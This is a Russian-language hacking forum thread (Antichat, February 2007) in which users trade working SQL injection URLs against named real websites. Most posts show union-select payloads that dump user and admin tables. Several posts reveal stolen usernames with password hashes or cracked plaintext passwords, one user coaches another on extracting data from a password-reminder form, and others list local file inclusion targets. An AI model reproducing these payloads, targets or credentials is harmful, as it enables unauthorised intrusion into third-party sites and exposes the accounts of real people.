ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #481  
Старый 13.02.2007, 01:00
Аватар для n0ne
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

Код:
http://www.teacherxpress.com/cat.php?gid=-31+union+select+1,concat(username,0x3a,password),3+from+users/*
patrick:7a2eb41a38a8f4e39c1586649da21e5f
 
Ответить с цитированием

  #482  
Старый 13.02.2007, 01:05
Аватар для ice1k
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

Цитата:
Сообщение от n0ne  
Код:
http://www.teacherxpress.com/cat.php?gid=-31+union+select+1,concat(username,0x3a,password),3+from+users/*
patrick:7a2eb41a38a8f4e39c1586649da21e5f
patrick:helen
 
Ответить с цитированием

  #483  
Старый 13.02.2007, 01:09
Аватар для }{0TT@БЬ)Ч
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

Цитата:
Сообщение от Goudini  
}{0TT@БЬ)Ч
юзай поиск по форуму, про эту скулю я писал раньше
http://forum.antichat.ru/showpost.php?p=285086&postcount=482
хмм у меня поиск не находит видать потому что в коде постишь
Вот нашел тока не пойму как ее заюзать? http://www.vsetv.com/remindpass.php?rplogin=1'+union+select+password+fr om+users/*&remindway=mail&subm2.x=33&subm2.y=21 скуля в напоминание пароля, как вывести данные?

Последний раз редактировалось }{0TT@БЬ)Ч; 13.02.2007 в 01:36..
 
Ответить с цитированием

  #484  
Старый 13.02.2007, 01:44
Аватар для +StArT+
+StArT+
Познающий
Регистрация: 10.02.2007
Сообщений: 38
Провел на форуме:
1223241

Репутация: 183
Отправить сообщение для +StArT+ с помощью ICQ
По умолчанию

Код:
http://www.f1-world.ru/champ2007/testres.php3?id=-1+union+select+1,concat(username,char(58),userpwd),3,4+from+users/*
admins:mikahakka
 
Ответить с цитированием

  #485  
Старый 13.02.2007, 02:18
Аватар для +StArT+
+StArT+
Познающий
Регистрация: 10.02.2007
Сообщений: 38
Провел на форуме:
1223241

Репутация: 183
Отправить сообщение для +StArT+ с помощью ICQ
По умолчанию

Цитата:
Сообщение от }{0TT@БЬ)Ч  
хмм у меня поиск не находит видать потому что в коде постишь
Вот нашел тока не пойму как ее заюзать? http://www.vsetv.com/remindpass.php?rplogin=1'+union+select+password+fr om+users/*&remindway=mail&subm2.x=33&subm2.y=21 скуля в напоминание пароля, как вывести данные?
Вот держи:
Код:
http://www.vsetv.com/remindpass.php?rplogin=1'+union+select+password+from+users+limit+0,1/*&remindway=secretq&subm2.x=28&subm2.y=6
andrey:asdfgh

Данные выводятся под строкой "Секретный вопрос:"

Последний раз редактировалось +StArT+; 13.02.2007 в 02:23..
 
Ответить с цитированием

  #486  
Старый 13.02.2007, 04:29
Аватар для Gorn
Gorn
Новичок
Регистрация: 25.10.2006
Сообщений: 13
Провел на форуме:
158978

Репутация: 34
По умолчанию

Вот, нарыл:
_http://kava.lviv.ua/event/index.php?id=-1+union+select+login,password,3+from+admin/*
_http://hockey.sport.com.ua/news.phtml?id=999999+union+select+username,passwor d,3,4,5,6,7,8,9,10,11,12+from+users/*
_http://www.yuretz.ru/prikol.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,11,12,13
_http://www.lv.ukrtelecom.ua/ua/hot_news/?id=202
 
Ответить с цитированием

  #487  
Старый 13.02.2007, 07:03
Аватар для Satirik
Satirik
Новичок
Регистрация: 18.08.2005
Сообщений: 19
Провел на форуме:
173872

Репутация: 36
Отправить сообщение для Satirik с помощью ICQ
По умолчанию

Возможно не все sql-инжекшн, но дабы не флудить пишу все тут.
Возможно некоторые не будут работать так как особо не вдавался в подробности. Не пинать )

Код:
http://www.startime.ru/rus/catalog.php?f='5eed087ad44807bca9394eb672be8e40
Думаю покапаться будет интересно

http://ckp.hut1.ru/index.php?akt=http://123
локальный инклуд

http://www.employment.ru/catalog/vi.php?pid='65
Можно покапаться

http://www.newastrakhan.ru/main.php?mode='fin
Локальный инклуд

http://adresov.net/search.php?q='
Можно покапаться
 
Ответить с цитированием

  #488  
Старый 13.02.2007, 08:06
Аватар для ice1k
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

Цитата:
Сообщение от Satirik  
Возможно не все sql-инжекшн, но дабы не флудить пишу все тут.
Возможно некоторые не будут работать так как особо не вдавался в подробности. Не пинать )

Код:
http://www.startime.ru/rus/catalog.php?f='5eed087ad44807bca9394eb672be8e40
Думаю покапаться будет интересно

http://ckp.hut1.ru/index.php?akt=http://123
локальный инклуд

http://www.employment.ru/catalog/vi.php?pid='65
Можно покапаться

http://www.newastrakhan.ru/main.php?mode='fin
Локальный инклуд

http://adresov.net/search.php?q='
Можно покапаться
К чему в этом топе локальный инклуд? =\
 
Ответить с цитированием

  #489  
Старый 13.02.2007, 08:40
Аватар для Satirik
Satirik
Новичок
Регистрация: 18.08.2005
Сообщений: 19
Провел на форуме:
173872

Репутация: 36
Отправить сообщение для Satirik с помощью ICQ
По умолчанию

я же специально написал ...***Возможно не все sql-инжекшн, но дабы не флудить пишу все тут.***
Все равно сюда за *халявой* идут
 
Ответить с цитированием

  #490  
Старый 13.02.2007, 09:11
Аватар для ice1k
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

Цитата:
Сообщение от Satirik  
Возможно не все sql-инжекшн, но дабы не флудить пишу все тут.
Возможно некоторые не будут работать так как особо не вдавался в подробности. Не пинать )

Код:
http://www.startime.ru/rus/catalog.php?f='5eed087ad44807bca9394eb672be8e40
Думаю покапаться будет интересно

http://ckp.hut1.ru/index.php?akt=http://123
локальный инклуд

http://www.employment.ru/catalog/vi.php?pid='65
Можно покапаться

http://www.newastrakhan.ru/main.php?mode='fin
Локальный инклуд

http://adresov.net/search.php?q='
Можно покапаться
http://www.startime.ru/rus/catalog.php?f=-99'+union+select+1,aes_decrypt(aes_encrypt(databas e(),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14/*

http://www.employment.ru/catalog/vi.php?pid=-99+union+select+1,2,3,concat(username,0x3a,user_pa ssword),5,6,7,8,9,10,11,12,13,14,15,16,17+from+php bb_users+limit+1,1/*
etc...
а инклуд на HUT'e вообще бред выкладывать =)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ